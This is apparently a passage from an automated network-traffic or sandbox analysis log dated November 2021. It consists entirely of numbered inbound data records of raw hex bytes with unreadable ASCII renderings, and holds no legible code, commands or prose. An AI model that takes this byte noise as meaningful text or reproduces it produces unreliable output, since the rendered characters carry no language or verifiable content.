2021-11-25 15:51:48 UTC	532	IN	Data Raw: ff b1 40 98 31 64 7f 8b e7 ca 87 69 dc af 70 a2 25 d0 2f df 3d 06 8b db 3c 33 5f 89 0e 39 3d 43 1e ec 63 d7 00 44 0a 33 46 8b e0 ac 4f 9e 67 e1 36 03 da 9c d3 ba cf bd ea f2 95 ca 96 13 df 3d f8 22 6c 83 fa 7b d5 1a 80 40 1c 73 2c 2b cf db 0e a1 00 ba 0f df c0 8a 6b d1 79 e5 c3 14 55 0b 39 8b 15 8d ee 67 02 8a 59 5e 76 e8 78 aa 60 ae 3f 9b d5 43 6d dd 90 27 ef e2 47 47 43 60 7a 1a 48 f7 9c 0e 56 d2 4b e4 49 aa 7b fa f3 39 87 15 c4 fc 11 ec 94 43 65 09 1e 4b 5f 7f f8 f2 32 0a 94 01 3e 11 d7 cc 29 a5 5b be d4 51 73 4b 2c 2d 74 f4 24 5e 91 a0 57 7e 47 a7 f0 64 8b ec 7d c9 0a 56 4b 49 a4 9d 3d 55 58 87 94 0a 55 3a 3e 18 45 6a d2 a2 1e 9f f0 6a 83 f9 9f cb 05 cb be 60 63 a1 22 8c 1c 19 d7 2b 68 f7 93 9d b0 cb 10 46 d4 56 b5 41 63 3c 28 1c 43 be 5d 8f 66 79 5a Data Ascii: @1dip%/=<3_9=CcD3FOg6="l{@s,+kyU9gY^vx`?Cm'GGC`zHVKI{9CeK_2>)[QsK,-t$^W~Gd}VKI=UXU:>Ejj`c"+hFVAc<(C]fyZ
2021-11-25 15:51:48 UTC	533	IN	Data Raw: 8f 6d 9f 93 93 f9 a8 ea 94 43 65 0b 28 14 ae 4d a0 37 a7 bc e2 2c 71 2f 58 aa 3a 0e a8 9a 05 31 bc 94 ea df a8 e8 1f 9f b4 2f de a5 17 93 84 7d ce a2 53 f6 e5 97 8a 56 e5 cb e8 e1 e8 43 b2 8f 95 b4 fe 33 53 e5 e2 76 a9 55 ae 47 67 1a 4f 47 ab 11 db dd ee 66 7a f4 3a 34 19 a0 05 20 18 70 78 54 0a 29 c6 6e ed fa 2a 16 49 b5 f9 b7 7d a9 31 8f 48 f4 fd 1e 74 cb 07 af a7 e0 53 79 dd d0 75 66 b3 41 b0 5f 4c 11 6f b3 bd d7 2e 13 dc 55 9e 60 9d b7 72 9f 5d bd 79 ed 98 05 0f c8 e6 41 b8 bf 53 75 d3 3a d0 26 4b 79 b9 6a 80 8e 2c f4 83 f7 7d 9e 0f eb f2 53 89 63 79 e0 4a d5 2b 55 66 6d aa 92 0b 19 5a 1b a9 5f 21 ef d7 f0 c9 77 e3 09 8a f6 e9 56 e4 aa 77 d5 4f 4a c9 e4 04 80 7b f2 53 96 99 90 2b 6d 9d e4 25 da 9e ca ca b3 4d 43 60 74 0e 7f f9 87 97 83 ec 66 8d 29 c5 Data Ascii: mCe(M7,q/X:1/}SVC3SvUGgOGfz:4 pxT)n*I}1HtSyufA_Lo.U`r]yASu:&Kyj,}ScyJ+UfmZ_!wVwOJ{S+m%MC`tf)
2021-11-25 15:51:48 UTC	535	IN	Data Raw: ec 67 b4 c9 0b db 3c 1e 48 90 83 ff 35 bc 15 af ec 52 fc 08 36 d9 b7 94 94 ed a2 5c 2b ae f3 00 9d 68 4e 9e 81 cd e1 c4 23 45 4c 21 e9 f7 a1 ae fb 7c 76 e7 1a b1 b7 72 6c d1 c0 f4 b0 f0 95 42 0c a0 03 37 87 49 40 fa c0 80 fb bd e4 d8 65 19 45 af 0c 2b 83 06 10 88 68 52 f7 2d d2 47 b3 4d 81 e1 3f 87 65 b7 54 cb 79 38 be e0 b4 aa 63 59 92 6b 37 0c ac 28 1f 4f 3f 4e 41 68 44 39 69 00 8c 69 ae 4e b6 6d 89 e0 68 59 1d 25 eb c1 19 5a 68 fb 76 e4 7b b1 a2 44 16 4b 45 62 65 64 b1 9d ae 30 95 bb 9d c3 14 6d 3e 19 31 5d c7 29 38 49 8e 9a ca 89 4a cc 66 3a fd 8c 85 55 ab 5e ae 63 3b 7f 4e 2e 3a 96 3f 43 e1 1b fc f3 53 b9 75 d9 8a 69 ec fb 41 6d 86 4c 3c 8c bd 5f fd 22 bf 63 3f 05 39 78 c7 dc 5c 20 48 3e 8c bd 52 03 84 a4 18 46 74 9f 7d 5a 35 b9 d1 3e da 16 8e 24 8e Data Ascii: g<H5R6\+hN#EL!\|vrlB7I@eE+hR-GM?eTy8cYk7(O?NAhD9iiNmhY%Zhv{DKEbed0m>1])8IJf:U^c;N.:?CSuiAmL<_"c?9x\ H>RFt}Z5>$
2021-11-25 15:51:48 UTC	536	IN	Data Raw: b4 63 ea 22 94 5f ec 7d fe 02 20 e6 81 e4 f0 69 05 08 a0 ad bd 95 2c 19 f8 16 ce 1d 10 a3 04 80 74 a7 fd e6 f3 e5 c2 3f a9 58 ed ff 69 0b 96 09 15 c1 bc d2 20 19 2d 2e 35 b2 c4 98 50 18 e7 cd 0f 1b e6 f5 a1 a7 a2 20 fb 6b c7 a0 0f ea 7f 5f a9 bf 8e a9 65 08 ac 91 30 be e2 7b 07 71 96 3d 93 ae f9 1f 07 c0 43 6c ba cf af 29 6a f0 63 30 05 34 a2 c4 b0 60 98 3d 94 5d 83 43 6f 2b 7c e1 f0 94 63 50 c8 83 f3 2e 1a a3 51 ce 80 7e 7e df 5c 31 e1 3e 06 74 9e dd 38 40 c6 67 30 ed 0c 88 d4 4d a5 c8 22 0e a8 62 8a 5f 12 88 66 6c 43 f2 66 89 e4 a6 cd b4 fa 2e 03 c6 76 ae 63 e0 bb 98 10 ba 16 87 27 31 89 0f 29 66 64 75 24 80 b5 0e 45 bd 22 fe e7 30 e5 78 43 a1 f9 40 5d f2 92 57 89 15 91 2b 61 fb dc b2 db e9 68 89 d6 ef a3 09 15 ce 4c d4 69 df cc 27 dc c2 1e 9b eb 74 ca Data Ascii: c"_} i,t?Xi -.5P k_e0{q=Cl)jc04`=]Co+\|cP.Q~~\1>t8@g0M"b_flCf.vc'1)fdu$E"0xC@]W+ahLi't
2021-11-25 15:51:48 UTC	537	IN	Data Raw: 51 31 b5 73 21 11 3d 32 8d e0 64 ec 85 30 5f e1 f6 14 58 07 c8 12 c7 1b f0 ef 0b 5a 9b 9d b0 fc 9c c5 66 d0 4f 7f ca 18 00 eb 76 66 8d 5b 14 ac 37 cc 06 b1 4b cf b0 95 97 2c 2c 12 af 55 f4 f7 fb 2d ae cd 0a 96 a9 c6 0f c7 e4 f6 1c 45 69 0c a0 06 8e 5b 52 68 83 f9 61 1f c6 7c bf d3 03 01 02 51 06 c4 1f f4 24 ef 0c 4a c1 fb 6b 89 e7 bf 67 36 1c e4 d5 1a 49 e2 7f 5f 80 d2 ea 71 58 d8 ab a5 b4 7e 45 a3 47 cd 0b 1c f6 9b 24 eb e5 fe 09 7f b2 09 9a bb c0 c0 66 63 48 33 71 1c fd 63 7d 93 9c 33 bd 8c 5c 29 1f 0d 41 58 6a b7 45 5a 56 d9 46 34 32 9c 01 0f dd e3 c8 81 29 84 ef 71 43 ab b1 8d 77 d6 a2 a4 ac c0 09 10 c7 19 c0 d6 a2 13 db 82 74 98 33 83 05 c0 70 26 6c 8a 01 3d a7 ae c4 61 1e 4d b1 ac eb 7e 46 e6 de ce d6 e5 1b eb e1 0e 34 c5 6d be 66 69 77 51 86 de 51 Data Ascii: Q1s!=2d0_XZfOvf[7K,,U-Ei[Rha\|Q$Jkg6I_qX~EG$fcH3qc}3\)AXjEZVF42)qCwt3p&l=aM~F4mfiwQQ
2021-11-25 15:51:48 UTC	539	IN	Data Raw: ae ab 6e 65 e5 f7 a7 a3 9d 13 6c 37 45 a7 9c 3a 35 8a 9d 5e 1a 7b f0 6a 4d a6 28 2f b6 f5 75 2e f9 ae f7 99 df b0 3f 93 94 f5 84 4a a7 a8 e6 3d aa 51 f8 03 05 42 57 8f 09 69 c5 dd df 01 8e 88 84 20 8d b8 63 08 a0 3f 21 11 5b 28 8f 70 f6 16 a7 69 04 83 cd e3 7d fe e6 47 66 75 45 51 7c 42 5e 5b 56 55 68 89 de 6f b8 06 5d 4d 7b c1 1f 34 63 99 e6 b3 40 fe 3c 85 f7 f9 6e ab f8 14 f5 9d 18 b9 82 4f c1 fb a5 e7 c0 ec 71 65 eb 77 dc 6c 7d af fd 86 74 9c 0c 29 68 ce f9 af 42 e2 c1 b9 97 60 d7 17 c6 91 c6 3e a5 9f b5 8e ab 55 cc 85 57 53 9a ea 3a 31 8a 6a 22 eb b6 8b 7a 59 5c 23 df 7b c6 61 e9 a1 93 9d b9 f3 74 ea 05 b1 49 41 a3 8e 5b 23 e9 f2 f3 aa c2 04 84 4f 17 58 e1 c1 17 79 d0 01 00 33 66 6f d2 e6 41 61 03 67 fd 6a 8e 1a 47 45 49 b8 e4 a5 28 e6 a2 65 08 95 83 Data Ascii: nel7E:5^{jM(/u.?J=QBWi c?![(pi}GfuEQ\|B^[VUho]M{4c@<nOqewl}t)hB`>UWS:1j"zY\#{atIA[#OXy3foAagjGEI(e
2021-11-25 15:51:48 UTC	540	IN	Data Raw: 7e 7a f6 24 70 4b bb d9 29 a1 a0 78 15 3e 2b af a9 a2 16 75 eb f1 63 e9 02 f2 ec 68 10 59 68 b0 4a 70 55 46 e4 38 0e 63 59 7d 38 01 3d 41 2f 75 e2 4e c0 63 4f 90 91 e8 7f 32 19 5c 33 83 03 25 55 e8 9d 50 e7 5c 7e a4 14 5b 1c 76 d8 e5 4a 57 6f 13 6d 04 45 c4 fa 9c c8 7c 4a f5 93 ad c2 c6 0a 41 a2 0e df 30 79 d9 2c 28 1a da f7 4e 61 0a 9f 05 38 d4 55 4e 61 e8 92 12 2a 1b c8 04 ee b8 69 01 3c d5 33 0c 0f d2 4d 65 a1 ad 6e a0 b3 ae 3a 36 3e 1c 7f 5e c7 28 82 42 e6 e3 cc 73 c1 ab 53 74 9a 81 18 6e a9 24 6a 8f 14 06 b0 56 d1 0b fe 64 0f 25 0d b4 f1 d8 a7 33 6a 98 07 0e 51 74 36 22 8b 77 dc 63 37 03 0c 31 b1 5b fe 84 7e 7d c4 34 0b 28 17 23 11 51 49 47 68 4f 8a c3 1b c8 8d a4 3c a9 66 80 b8 04 29 25 df 4b a2 d0 b3 4f 40 26 f9 c4 be 7b cb 30 bb 60 70 26 12 d5 ca Data Ascii: ~z$pK)x>+uchYhJpUF8cY}8=A/uNcO2\3%UP\~[vJWomE\|JA0y,(Na8UNa*i<3Men:6>^(BsStn$jVd%3jQt6"wc71[~}4(#QIGhO<f)%KO@&{0`p&
2021-11-25 15:51:48 UTC	541	IN	Data Raw: 81 c8 7c 7a 4d b0 bb de 6d 82 7e 57 99 f4 b2 f3 55 52 e7 28 0d 96 3d 1a 76 3d 58 f5 28 20 dd e7 d5 dc 37 24 67 89 d1 2e f8 02 0b 13 7e 7c 20 8b 8e a5 ab e1 c8 ed 02 a4 85 fb 2a 1a ec 9d 53 69 94 fe 73 8d e4 71 27 a5 19 38 0b 25 4f 72 1f cc 7f 2f 34 3f a7 a9 cd 8a 34 9e da 97 8e bc ec 9b 33 c0 74 4a 26 d0 b2 c8 8f 1b b1 0b a0 07 08 50 09 91 a5 a5 aa 4a 4c 91 d4 f3 ed fe ea 0b 91 90 22 6e 1d c4 97 bd 69 ae 90 fc ea 70 a4 97 8f 31 b6 1d 1e c3 65 07 07 a7 35 fd 0e b1 7b f9 7f ad ba 4a f4 f4 f6 63 99 6b 17 78 69 35 be 70 e3 e4 d1 35 88 c6 a9 a8 24 39 24 80 a0 8e 20 7f c6 16 0e bf e8 45 5d e2 6a 14 50 c3 2c 98 98 51 5c c1 11 e8 c8 b3 aa 29 c2 14 bb 8a c8 8a 61 33 0c f8 bc 7f fc 0d d1 1b 4a c8 8b dc db 57 2a b1 0e 5d 2f 6e 5c 2d a5 99 ba 5f 1c 76 66 8d 6c f2 ee Data Ascii: \|zMm~WUR(=v=X( 7$g.~\| Sisq'8%Or/4?43tJ&PJL"nip1e5{Jckxi5p5$9$ E]jP,Q\)a3JW]/n\-_vfl
2021-11-25 15:51:48 UTC	543	IN	Data Raw: 43 29 84 92 6b a5 ae 5c 77 cc 62 86 63 5d e2 4f 1d 0b 20 84 c9 1a 70 e2 f1 03 07 06 01 06 50 03 2d 19 3c 0a ff bb 60 9b 33 dc e7 25 ef d9 8c 6f df 2b c0 6c 48 ab 1c 76 58 d8 23 af c8 6f 53 70 5c 80 82 e5 46 43 a2 7b 5a f8 b3 73 ba d7 cf e3 80 99 74 19 41 ba a2 c4 cd 30 95 72 14 5f f0 95 b0 f0 54 ff 11 1b c1 a5 9d 38 c6 3e 2d 61 ac ac ef cc 72 4e c0 79 31 70 95 b4 f7 9f 4b 60 d4 90 17 c1 92 b5 e1 59 8e e0 1d 86 44 dc dc 5b 05 c7 7d 7e f2 9e c7 1a af 46 64 15 cb eb ca 01 e7 15 4e c5 70 48 27 d3 da 53 7d 5d f1 07 0e 66 8a 6b c5 3b c7 2d a4 1e e3 54 cf 6e 55 63 37 27 df c6 62 e1 68 24 96 f8 13 2c e1 cb f9 a2 df 44 39 2d 1a c5 13 81 15 a8 6d 08 4b b0 c3 f5 a6 d3 bb fd 10 62 cb fa fa 1c ac b5 dd dc b2 c2 79 40 14 cc 88 29 72 58 d8 43 6e 50 74 ad df ee 26 8f 8a Data Ascii: C)k\wbc]O pP-<`3%o+lHvX#oSp\FC{ZstA0r_T8>-arNy1pK`YD[}~FdNpH'S}]fk;-TnUc7'bh$,D9-mKby@)rXCnPt&
2021-11-25 15:51:48 UTC	544	IN	Data Raw: 00 6f 7e 7e 46 e6 b2 2d 5c 9a 07 db c3 12 52 ce 5e 66 18 48 f2 8a 02 b5 42 d4 30 f5 2c 1b 4a fe ad c1 8f 19 96 71 6e a1 a1 49 2f b3 ae d6 01 ca 75 36 9a 99 09 1c 90 e6 c5 2e 07 36 c6 67 d9 a1 29 7a b9 d8 94 30 03 67 ea 78 60 93 6b 29 ad a0 5c 2b 07 a4 a1 ea cf 03 35 be 10 46 e7 35 a2 92 1b 67 92 09 d5 54 14 58 e1 f3 9d ba fb 03 d4 e0 c5 02 6d 3d 35 12 d7 b2 4c 9a e8 24 55 62 7f d9 2d 71 4b e2 d9 9a c2 60 67 7a c1 91 cb c0 05 0e 59 91 ba de 67 07 0a 1f 80 e8 70 d6 66 96 85 63 eb 1e 42 2f 66 8f 63 ea 72 36 d0 59 f5 11 33 2d d8 c4 65 71 c1 1d f5 a4 6f 2b d9 18 71 cd 69 ad 9a 1b 55 eb 71 c0 1f b9 f5 7a cd 73 b3 c2 00 12 c6 0c 2f 12 c5 90 19 de a2 33 2a 22 63 00 18 cc 02 43 16 c2 fa ba 9d cf 59 9e 6e 30 eb bf 84 8a 6b de a5 f7 af 45 56 10 3c 9f 22 96 2a bf e2 Data Ascii: o~~F-\R^fHB0,JqnI/u6.6g)z0gx`k)\+5F5gTXm=5L$Ub-qK`gzYgpfcB/fcr6Y3-eqo+qiUqzs/3"cCYn0kEV<"
2021-11-25 15:51:48 UTC	545	IN	Data Raw: 6e 42 e2 99 61 de b4 04 03 33 ba 59 af b7 40 d1 30 0b 8b 6b dc b5 8f 58 e9 f9 94 17 32 37 b9 fb 8e 25 5f 22 9f 39 85 45 52 7e c7 9a 42 5e 92 17 ff 6c d5 14 c7 88 f7 f0 da 3c f1 65 fd 90 0b 38 f2 9b 39 5d 44 31 72 a7 46 56 6f c1 55 df 5d e8 b8 78 bf 62 b5 d4 2e c4 94 99 8d e8 d3 35 0d 21 76 a8 05 3e be 74 fe 81 fd b4 f0 9b a3 a4 a8 cc 9f d8 21 09 76 ab 19 18 71 12 55 ce f4 22 5b 19 2b 7c 2a 21 e2 4e 42 d3 ab 41 a4 41 6b 3a 09 12 06 d1 f0 51 4a 2b 89 d0 1d a4 22 63 04 f9 4d c5 14 6a 57 02 ba 61 fe fc 12 69 3c 1b 76 1e 4f 33 b9 0c 43 da 86 f4 55 43 86 4c cd ac 94 0c 93 96 f9 62 e1 fd 87 cf af b4 06 95 0a f8 85 39 89 e9 15 5f 3d 32 52 b6 20 74 96 eb 0f dc b8 13 fa 83 49 19 ca 8b d1 be b0 69 e2 75 e1 36 25 24 93 d2 2a 09 bc 0e 06 4f 35 83 f2 6b 34 95 07 f4 50 Data Ascii: nBa3Y@0kX27%_"9ER~B^l<e89]D1rFVoU]xb.5!v>t!vqU"[+\|!NBAAk:QJ+"cMjWai<vO3CUCLb9_=2R tIiu6%$O5k4P
2021-11-25 15:51:48 UTC	547	IN	Data Raw: 61 d4 f8 34 14 63 64 1e a8 fe cb ef c4 c6 03 29 ba 61 a2 ec 1e e6 2f 92 17 fd 35 4b 89 60 82 e1 e5 c8 ff 9d 10 c9 45 18 b4 7a 86 7b b5 1d eb 5f 83 e3 40 c7 13 ae fe 3a 58 e0 82 88 3e 43 7a 05 0e 42 f4 3e cc 71 ea e0 1d 73 a7 c2 ee b6 ac 46 d3 fb 22 59 3a eb 14 bf e9 93 ff 3e ea 93 94 86 45 8c 86 db 3b 4a 04 1b 06 a2 b6 82 42 42 3e da 65 b4 ce 5e 76 e5 06 01 ea 24 5d 53 9d 7e ac 4a 1e 58 7c 5d 99 ab cf a2 4d f7 62 65 26 2b cf bd 40 11 82 eb 62 fa 73 0e c1 3c 79 63 6a 27 ad 13 dd c9 8f 0b e4 a0 e4 cb 1c 70 1e 82 b5 b7 dd 7c ff 73 ed 87 60 c6 36 f5 00 a7 d3 d2 8a 5d 63 ca 97 bf bb 51 24 55 15 52 d4 24 41 80 1d 39 6d c2 b3 c1 42 d4 c2 a1 b9 12 b6 6b 61 21 f2 8b 80 9c 4d 10 e8 3e ea b8 e6 d4 82 de 27 4e 2d d2 3d 1a c7 46 ec 88 3a 19 57 7b 6b a8 73 ca 84 1e d4 Data Ascii: a4cd)a/5K`Ez{_@:X>CzB>qsF"Y:>E;JBB>e^v$]S~JX\|]Mbe&+@bs<ycj'p\|s`6]cQ$UR$A9mBka!M>'N-=F:W{ks
2021-11-25 15:51:48 UTC	548	IN	Data Raw: fb 09 ae 50 12 1a c9 1a fe aa 45 1a bf f8 20 4b cc 22 69 65 51 a1 91 98 ff 7d 0f 66 8d 5f 13 52 7f 95 a5 bb 57 69 c8 b5 88 07 a4 df d2 14 df 5a b3 e9 29 97 86 9e 06 2c 17 f6 16 d0 2a e5 8b ad 20 12 5b 23 0b 46 e4 b7 14 f0 a6 b3 c7 59 19 0c af 75 32 62 85 02 a8 75 1c 9d 48 fe e7 2f b8 66 07 b0 89 f1 20 75 e2 ab 31 8a 3b 68 6a 81 c2 78 b4 6d 64 3f 02 b0 c7 cf a6 11 33 16 d2 82 8c e9 f6 e2 aa d7 2f e8 fb 00 4b 23 74 48 81 77 c9 10 d2 45 16 de b9 cd 0c 52 c8 24 64 5a 8d 7e cb 67 8a 92 bb 58 58 e0 e6 40 28 1c 70 0b 27 d5 12 6e 0e 59 fe 1a 79 db d9 18 39 ab a0 0b 2f 8f a4 2f da be 22 57 54 09 35 37 4d 79 22 00 32 80 b8 fa fa e5 cb ef d8 0b 24 f2 f2 d3 38 a1 fd ed 6a 8c 64 6a a3 30 d4 9b bd 62 e1 6d cd f0 54 57 61 eb cf 00 71 ae cd 92 92 99 05 63 61 8b eb f8 fb Data Ascii: PE K"ieQ}f_RWiZ),* [#FYu2buH/f u1;hjxmd?3/K#tHwER$dZ~gXX@(p'nYy9//"WT57My"2$8jdj0bmTWaqca
2021-11-25 15:51:48 UTC	549	IN	Data Raw: 93 ed 97 93 73 42 e6 ba 0a 98 6d a6 95 b2 2d 93 9e a6 26 2d 0e c6 63 42 4a d1 4d 82 ae 26 a9 11 17 4d 76 ad 8d e1 4c 46 20 2e e5 97 fe 0f e1 c1 8f 19 56 27 fc bf 14 68 84 77 48 3e da df 25 08 37 83 c0 d7 c8 75 52 fc 0e 59 e8 3a 0b f9 9e 3f 41 e3 51 8e f4 2a 11 eb c1 fb 3a 34 83 6e e9 29 99 bc e4 a5 b1 c2 da 04 7c 4d 4d be cd 49 49 70 9d 59 13 e5 cb e1 f6 21 fc f5 0b 28 17 cb 31 c7 15 20 00 bb 52 c2 98 aa 34 ca 59 6e 3a 7b 59 ef e2 46 2d 7d c7 18 44 d4 00 83 57 40 27 d7 2e ff 6f ac d0 bf 5e 09 a5 21 6a f9 d8 2c 13 ed 16 2c 9c c9 f7 cf 35 80 4c 35 d0 0d ed 57 8a 0f 78 6b 38 35 87 5c 0f 2b f2 c9 30 30 3c 2a a1 99 61 6e 0c 9e 3b ac d8 05 05 db 6a 4e c0 43 d8 5a 06 39 73 dd 39 22 9e 31 83 57 16 a1 20 7c 12 86 f2 fe c9 61 93 75 84 e5 a1 5e 6e a9 e4 33 b8 f2 5f Data Ascii: sBm-&-cBJM&MvLF .V'hwH>%7uRY:?AQ:4n)\|MMIIpY!(1 R4Yn:{YF-}DW@'.o^!j,,5L5Wxk85\+00<an;jNCZ9s9"1W \|au^n3_
2021-11-25 15:51:48 UTC	551	IN	Data Raw: 62 60 1c 85 ed 78 b9 82 4d ae 20 56 2f 98 3a d5 ea 40 2a 26 ad 33 8e e9 20 71 10 67 e8 95 c7 83 1f 1d c7 f8 30 f3 ea 7b f5 13 3c d9 3c 1d c4 ad d6 21 72 28 5b 07 32 3f a9 b6 ef 79 3c 76 04 89 eb ff b1 ba 61 12 d9 d0 59 2a 94 49 34 0b 19 cc 69 c6 8a e8 99 10 2a 9d 2a 51 52 6d 0a 9e dc 33 18 a6 44 74 24 80 bc 8e 82 fe 4c 52 c3 1a 48 35 de 52 aa 8c 54 cd 0f 88 6f a1 ab 68 d7 1c 76 61 00 55 f7 a6 cc f7 83 cb 3b 94 05 6b c4 6b 08 97 90 ea 8b e1 22 9c 4c 49 cc 0f 8a b2 bb 54 cc 72 5a d2 d1 39 16 a2 d4 08 97 87 ff 64 6a c6 74 31 b5 c1 18 c9 97 72 43 43 ce 20 3c 13 06 b4 c4 77 c5 8f 7c 2b 3e 29 52 bc aa 21 d6 96 3d 7c 42 26 e4 6a 52 0d 3c 16 44 d7 af da 92 4d d3 da 57 1b 17 b8 4f 7c 7a 56 b6 63 3d ae c9 f6 f8 b2 bb 61 03 de b4 89 42 d4 0c 9d 15 fa fc 1e 75 41 cd Data Ascii: b`xM V/:@&3 qg0{<<!r([2?y<vaYI4i**QRm3Dt$LRH5RTohvaU;kk"LITrZ9djt1rCC <w\|+>)R!=\|B&jR<DMWO\|zVc=aBuA
2021-11-25 15:51:48 UTC	552	IN	Data Raw: 11 ed cd f0 65 f6 8c 2e 9c be b3 62 d0 b6 f5 7b aa ef 00 9a 33 65 24 69 0e 5f eb 0d 74 9d bf 6b a0 d2 5a ae 42 9f a5 a2 2e 39 5b 7f f5 6c c0 f7 ad 50 cc 26 51 49 44 e6 cf 69 86 a0 38 0c 4f 90 1f fc 02 81 6e 5e 6d 24 5d 1e 40 aa 9d ab 88 52 8a 85 e0 6f c1 2f 95 8b d8 a9 c0 4e 41 c2 d7 78 48 c0 dc ba 90 22 e1 8a a5 cd 3b a1 41 3b 94 e9 ec de e2 e4 40 d1 ce a2 bb 86 91 a4 18 4b 44 5c 74 86 21 ef e9 c5 92 e5 21 b4 78 de 08 65 dd e4 48 3c 31 02 40 dc 63 30 ae 58 1a a5 fe 34 04 80 d3 cd 9d fc 91 d9 82 77 de 6c 54 ed c2 7c 2b a4 dc f5 a3 a6 1a bc 0c f2 f6 87 a4 78 65 0b 19 2e 6f 1a f5 64 83 ce bb fc 42 b7 ea 79 e6 b2 a1 a0 db c8 d7 1f fc 0c 9f 16 7d 74 ae 4d 0b d4 39 8c 6a 42 be e2 aa 28 17 f5 a2 dc ce 81 fd b6 77 56 05 62 01 1d cb 0e 2c 1e ba 58 3f ab 83 75 2f Data Ascii: e.b{3e$i_tkZB.9[lP&QIDi8On^m$]@Ro/NAxH";A;@KD\t!!xeH<1@c0X4wlT\|+xe.odBy}tM9jB(wVb,X?u/
2021-11-25 15:51:48 UTC	553	IN	Data Raw: 46 42 d6 93 75 63 02 48 a7 35 47 5f 8a c4 31 53 67 ef 85 55 54 9b 38 fa 61 31 b6 c1 26 55 c3 1d 25 2e 6c 15 f9 76 b3 d3 ef 07 cc b0 cb 3c 41 54 07 38 3b 1e b8 06 99 8a 63 75 d8 a3 3f 12 36 30 04 b1 ce e0 23 fd 80 77 2f ea 77 4a 97 8c 0a 94 00 70 b7 7e a7 cc 27 ef 05 ca 0d 25 f6 d2 5e 67 04 83 cd ec e5 14 34 07 36 00 fd 67 5d be d2 59 9f 23 ee 67 35 dd 41 cd e5 9e a8 cc d3 b2 8a 26 b7 67 6d 87 63 e3 8f 74 e5 5a e6 43 6f bf f5 45 31 2b ab 62 85 f2 ef 06 54 b0 c0 ed f3 7a 87 b9 c0 1c 89 bc df d5 1b aa de df ab 68 5b a9 6d d9 06 e6 4e fc 30 84 96 ee 2a 9c ea 1a dc 46 3a 73 a5 ad db e5 d6 54 ba 01 09 a6 15 d6 48 cb e7 f9 48 f9 84 92 21 16 76 a9 65 bc 1f 0d 2b d7 7f 53 70 90 f7 8e 9e d3 c3 49 4b 70 ad ca 39 8b 56 51 da 18 cf 7e 4d 21 ec 44 30 6b 07 b4 af c8 40 Data Ascii: FBucH5G_1SgUT8a1&U%.lv<AT8;cu?60#w/wJp~'%^g46g]Y#g5A&gmctZCoE1+bTzh[mN0*F:sTHH!ve+SpIKp9VQ~M!D0k@
2021-11-25 15:51:48 UTC	555	IN	Data Raw: 78 78 0c 91 92 2a 59 b4 7e 7c 7b 22 04 b1 fd 09 6d b2 3a 0c aa 3a 59 6b a9 bf 89 f3 67 50 13 b5 7d f2 9d a1 ad e0 c0 ae c0 38 39 b0 2c 78 61 9c c8 00 ad d6 f6 ad 37 8f 98 fc 14 6a 1c 2d af 4f 42 98 6f d9 1a 4e 11 cf 3c b6 07 dc 17 f6 20 44 4c 99 0f cc 8b e1 30 e0 0b 2f 83 f6 96 54 ff cc 8f a4 88 e2 bf 4b d0 b9 7c 4c 45 ad af 01 9c 7e c6 13 ad 53 8e eb 8c f5 78 c8 c2 31 06 39 ee 73 1f fc 0c 5b ed e8 e6 aa 24 3a 90 89 7b 8e 02 b7 44 ef 00 eb 25 20 ec 4c 73 1d 5f f0 e6 44 30 a6 73 93 3b 0d ec d9 29 8c 64 bf 62 bb e3 22 c7 83 b0 4d 0b 60 09 21 ec f4 93 04 f8 14 d0 82 4a 25 8c 6e cb 38 39 8d e2 d2 39 3a df 80 ce a3 49 b1 3b 4b cd 52 08 07 1c 36 f8 e5 07 bc 0a f7 66 c5 e0 62 84 7b 54 7c b5 df d9 de b1 15 5f 89 26 39 e7 03 6b 34 3f 46 c3 28 ea 15 66 87 72 2a e6 Data Ascii: xxY~\|{"m::YkgP}89,xa7j-OBoN< DL0/TK\|LE~Sx19s[$:{D% Ls_D0s;)db"M`!J%n899:I;KR6fb{T\|_&9k4?F(fr
2021-11-25 15:51:48 UTC	556	IN	Data Raw: 20 33 41 df 55 ad 6b e1 47 68 41 ce e2 b4 4c 96 c1 7d 01 5e 82 1b 94 2f 67 83 28 f1 6c 36 f2 f3 aa 25 06 38 ee e4 48 3d c5 18 86 38 d3 be a7 63 92 2a 07 2c c3 3a f4 5c 8c 0a 94 e1 fc e7 5c 02 59 f5 0f 6c d6 4f e4 ad a4 18 b7 8a 6f c3 85 f8 e9 46 e7 3f 3a 37 4d e5 f7 80 a3 a0 3f ae f4 10 bc d0 5f 5f 20 28 d4 9d a3 c2 a5 57 17 1b 81 cd 33 6a 19 cc b0 93 ac a2 4d 50 f1 df e8 81 43 25 16 6b f5 e9 53 81 7a ab d9 25 82 1d c8 65 96 04 54 b7 74 ea b9 19 3c 83 c4 f1 f1 dc b4 11 db 3b bf b7 66 b5 1b 1e 9d b4 f3 d5 28 07 54 ed ce b1 47 b9 e4 48 36 19 54 d1 88 8e 98 fb cf 55 03 04 45 be d1 c6 63 34 e1 a4 2a 0c 60 86 98 8d eb 20 29 99 94 f6 90 28 ef 7d f6 7b a9 59 50 91 a5 d5 4b 5e e8 72 ae 30 f8 1b 02 50 cc f3 44 22 f5 60 0e 51 8b 4a cb 63 14 55 85 f8 17 9f 62 83 05 Data Ascii: 3AUkGhAL}^/g(l6%8H=8c,:\\YlOoF?:7M?__ (W3jMPC%kSz%eTt<;f(TGH6TUEc4` )(}{YPK^r0PD"`QJcUb
2021-11-25 15:51:48 UTC	557	IN	Data Raw: 7e 9f 2e 33 fd 6c 1c 46 3c 84 77 ed e2 6c 4f 1f fc db ce 07 30 c1 71 82 7b 42 88 52 64 81 c5 5c db 47 d2 3d cf 7c 8d 40 08 32 e7 91 1a c4 d8 5e 11 d8 a6 cf 9b 83 1f 40 22 73 62 8c bd 76 e2 4c 14 35 1b f6 5c 52 6b 0b 28 54 bb f7 15 4e 9a 00 67 02 8b 29 e8 cc bb 3d 20 fe ec 30 e3 94 c3 ff 04 86 9c c5 1a ca 1d 16 f5 90 8a 9b 1a 74 72 b6 9c c9 17 0a 75 2e fd 98 e0 40 df 30 f1 17 aa 24 03 dc b8 15 3f c9 f1 ff 77 2b 7e d9 3b 58 fa 96 87 6a 33 e6 b6 b2 56 7b 50 70 c6 72 f0 f3 6b 95 30 6f dd 80 f7 3c 98 bf 05 cb 5d b9 ca 2a b1 27 0a e0 f0 da 1f 40 3e c1 58 54 4b e5 62 95 67 43 e8 d8 1b 4d 5e 7d 8a d6 1f 5f af 58 07 3e e9 26 bf a3 cb f4 15 1b 33 44 0a b3 aa e4 96 d4 7c 8b 0d 2e ab e7 9d 88 89 19 cd 3d ce 34 36 25 ab 5d 15 dd 42 43 4f 88 50 85 9e b7 49 44 be 6e 93 Data Ascii: ~.3lF<wlO0q{BRd\G=\|@2^@"sbvL5\Rk(TNg)= 